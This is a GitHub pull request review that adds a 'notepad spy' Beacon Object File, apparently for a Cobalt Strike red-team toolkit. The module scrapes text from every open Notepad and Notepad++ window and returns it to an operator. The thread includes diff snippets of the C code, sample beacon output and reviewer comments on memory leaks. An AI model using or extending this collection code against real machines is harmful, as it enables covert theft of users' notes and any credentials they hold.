Add notepad spy

nowhey2 opened the pull request:
Idea based on: https://github.com/trainr3kt/NoteThief
The original would only grab the top most Z item and stop.
The original only did notepad.
This module borrows code and searches all visible windows with non-null names for potential sources.
This module has been written in a way to support changing the WindowName search text and ControlName search text in the future (Enum* functions don't easily support having 2 parameters so i passed on this for the time being)

The module grabs the text by calling GetWindowTextA on the control object for the editor ('Edit' for notepad and 'Scintilla' for notepad++) and is not reliant on the clipboard.

I opened 3 notepads, each having 'test1, test2, test3' in them respectively and one notepad++ containing 'this is a test in notepad ++'

Output of BOF:
```
> notepad
[*] Searching for open notepad windows
Running notepad

[*] Running notepad
[+] host called home, sent: 2690 bytes
received output:
[+] Notepad++ Found: Notepad++
this is a test in notepad ++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad++ Found: Notepad++

received output:
[+] Notepad Found: *Untitled - Notepad
test3

received output:
[+] Notepad Found: *Untitled - Notepad
test2

received output:
[+] Notepad Found: *Untitled - Notepad
test1

```

Notepad++ does have more than one scintilla control. I did not dig into that further (that is why you see several reported).

freefirex commented:
Thanks for this pull request.

Wanted to let you know I'll be taking time Monday to review the existing pull requests and issues. Should have feedback for you on that day

freefirex commented on src/SA/notepad/entry.c:
```diff
@@ -0,0 +1,75 @@
+		if(MSVCRT$strcmp(ClassName, needle) == 0) {
+			buffer = (char*)MSVCRT$calloc(1, len+1);
+			USER32$SendMessageA(hWndParent, WM_GETTEXT, len, (LPARAM)buffer);
+			BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad++ Found: %s\n%s", WindowName, buffer);
```
Buffer is leaked and should be freed after this line

nowhey2 replied:
fixed.

freefirex commented on src/SA/notepad/entry.c:
```diff
@@ -0,0 +1,75 @@
+
+	if (ClassName[0] != 0 && WinLen){
+		if(MSVCRT$strcmp(ClassName, needle) == 0) {
+			buffer = (char*)MSVCRT$calloc(1, len+1);
```
Its possible the to much or too little memory is being allocated.

I would suggest having a call to https://docs.microsoft.com/en-us/windows/win32/winmsg/wm-gettextlength and sending that to get the amount of text in the control.  Then you can allocate that size (+1 just in case for the null terminator) instead of always doing a static 65535.

nowhey2 replied:
So, I am going to change this.  I set it to 65k to prevent the operator from being text wall bombed if there is a huge text file open.  I'm not sure what the right answer there is but will change as you suggested.

nowhey2 replied:
fixed.

freefirex commented on src/SA/notepad/entry.c:
```diff
@@ -0,0 +1,75 @@
+
+void go(IN PCHAR Buffer, IN ULONG Length) {
+	datap parser;
+	BeaconDataParse(&parser, Buffer, Length);
```
As no arguments are sent, you don't need to call this or have the parser

nowhey2 replied:
Yeah that was a legacy where i was trying to pass different search patterns and controls and it was unfortunately unworkable.

nowhey2 replied:
fixed.

freefirex commented on src/SA/notepad/entry.c:
```diff
@@ -0,0 +1,75 @@
+				editHwnd = USER32$FindWindowExA(hwnd, NULL, "Edit", NULL);				// Edit is the default control for textarea in notepad
+				if (editHwnd)
+				{
+					buffer = (char*)MSVCRT$calloc(1, len+1);
```
Same as above, buffer is leaked, and you should send https://docs.microsoft.com/en-us/windows/win32/winmsg/wm-gettextlength to get the text length

nowhey2 replied:
fixed.

freefirex commented on src/SA/notepad/entry.c:
```diff
@@ -0,0 +1,75 @@
+					buffer = (char*)MSVCRT$calloc(1, len+1);
+					USER32$SendMessageA(editHwnd, WM_GETTEXT,len,(LPARAM)buffer);
+					char classname[128];
+					USER32$GetClassNameA(editHwnd, (LPSTR) classname, 128);
```
can delete this line and the one above it since we don't output classname

nowhey2 replied:
I think this might be left over from where i was debugging/looking for the control name for notepad++, will look at this part closer.

nowhey2 replied:
fixed.

freefirex reviewed (changes requested):
I found a few memory leaks that should be addressed and one logic flow I would like changed.  Please see the comments.

After those are addressed we can get it merged in, Thanks!

nowhey2 commented:
The memory leaks will fix.
The issue with the length and it being statically set, that was legacy of the original BOF. Will get that fixed.

nowhey2 commented:
Ok changes are all pushed.
I fixed the memory leaks.
I calculate the full text size rather than trying to truncate it (phear to those who dump a big file :) ) and use the new size to allocate for the buffer.
I removed unused code.
I moved some of the variable declarations down to where they are used as in most cases they are unnecessary.
I tried to make my whitespace and bracket spacing consistent but at least as far as the whitespace something was lost in translation.

freefirex reviewed (approved):
Looks good!

We can do a +1 on the GET_TEXT to not have the last character cut off.  It's safe since it's expecting the full buffer length and using that last position for the null terminator, which is why it was cutting off before.  I'll add that on my end as I push up the .o files.

Neat example of some unique ways to try and grab text, this is a cool addition!

nowhey2 commented:
Oh I just noticed I didn't update the readme, i guess that always feels presumptive to me to do so.
